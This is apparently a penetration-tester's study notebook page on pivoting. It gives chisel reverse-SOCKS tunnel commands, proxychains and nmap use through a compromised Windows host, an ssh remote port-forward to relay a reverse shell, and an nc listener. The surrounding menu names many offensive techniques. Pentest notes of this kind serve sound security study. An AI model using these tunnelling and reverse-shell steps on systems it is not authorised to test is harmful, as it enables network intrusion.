🤯
Hacker Mind
  • Penetration Testing Notes
    • 00 - Kali Linux Preparation
    • Page 1
    • Web Application (80/443)
      • XSS
      • LFI / Path Traversal
      • Wordpress
    • SMB (445)
    • LDAP
    • MSRPC (135)
    • MSSQL
    • Kerberos (88/tcp)
    • DNS (53)
    • IPv6
    • Import Nessus to Metasploit
  • STUCK? Look at this :D
  • Buffer Overflow
    • WinDbg
    • BoF Script Python
  • Active Directory Recon
    • Username Generation
    • PowerView
    • BloodHound
    • Flooding Attack
  • Payload
    • Sendemail
    • Phishing Payload
    • Bypass All The Things
      • AppLocker
      • MSBuild Shell
      • C# Runner
      • Payload Mod
      • Powershell
      • Bypass AV Linux
        • C Runner
  • Exploit
    • Brute Force
    • File Upload
    • Cracking
    • Shell & Stabilization
    • Database
    • MSSQL Injection
  • Tradecraft
    • Invoke-ReflectivePEInjection
  • Metasploit
    • Meterpreter Tricks
  • Privilege Escalation
    • Lateral Movement
    • Linux
    • Windows
  • Post Exploit
    • Active Directory
      • Kerberos
      • ACLs/ACEs
      • DCSync
      • Golden Ticket with krbtgt
      • LAPS
      • Page
      • Impersonate Token
    • Pivoting
      • Pivot in a Case
    • Transfer File
    • Exfiltration
    • Persistence
  • WiFi Pentesting
    • WPA-PSK
    • WPA-E (hostapd)
    • Attack WEP
    • Evil Twin - Wi-Fi
    • WPA3 Downgrade
  • Hardware Hacking
    • Information Gathering
  • Practice & Lab
Powered by GitBook
On this page
  1. Post Exploit
  2. Pivoting

Pivot in a Case

PreviousPivotingNextTransfer File

Last updated 2 years ago

If you have a VPN to target machine, but just running in the windows machine, and you wanna attack from Kali Linux.

  1. Fire up the windows and establish the VPN connection, make sure you can access the target machine.

  2. Setup connection Host-Only connection between windows machine and kali machine. make sure you can communicate with kali machine.

  3. Upload chisel.exe to the windows machine, and install chisel in the Kali.

  4. Setup chisel server in the Kali Machine

chisel server -p 9090 --reverse

  1. Then connect to the chisel server with windows machine.

.\chisel.exe client <ip kali machine>:9090 R:socks

  1. Set /etc/proxychains.conf with socks5 proxy

[ProxyList]
socks5 127.0.0.1

  1. Test connection Important: This connection will reproduce source IP in the packet with the windows ip, so you can't do ping, because Kali machine can't receive the ICMP packet. If you do nmap, always use -Pn for ignoring the ping to discover the machine.

proxychains nmap -Pn <target machine behind the windows machine>

How to setup reverse shell?

You need another forward proxy from windows machine to the kali machine.

there is 2 options based on the middle machine. Linux Machine & have ssh

ssh -R <middle machine IP>:<port>:127.0.0.1:<listen port> user_middle@<middle machine IP>
ssh -R <middle machine IP>:443:127.0.0.1:8080 user_middle@<middle machine IP>

Your reverse shell:

host:<middle machine IP>
port: 443

netcat listening shell:

nc -lvnp 8080

How about setting up your burpsuite?

requirement: 1. tunnel connection with socks5 127.0.0.1 9666 --> use chisel above

  1. Set your browser proxy to burp proxy

  2. Just let it go :D

ref:

ref:

https://www.youtube.com/watch?v=mOuqPROMmZc
https://www.youtube.com/watch?v=Q5ujOEXGOo8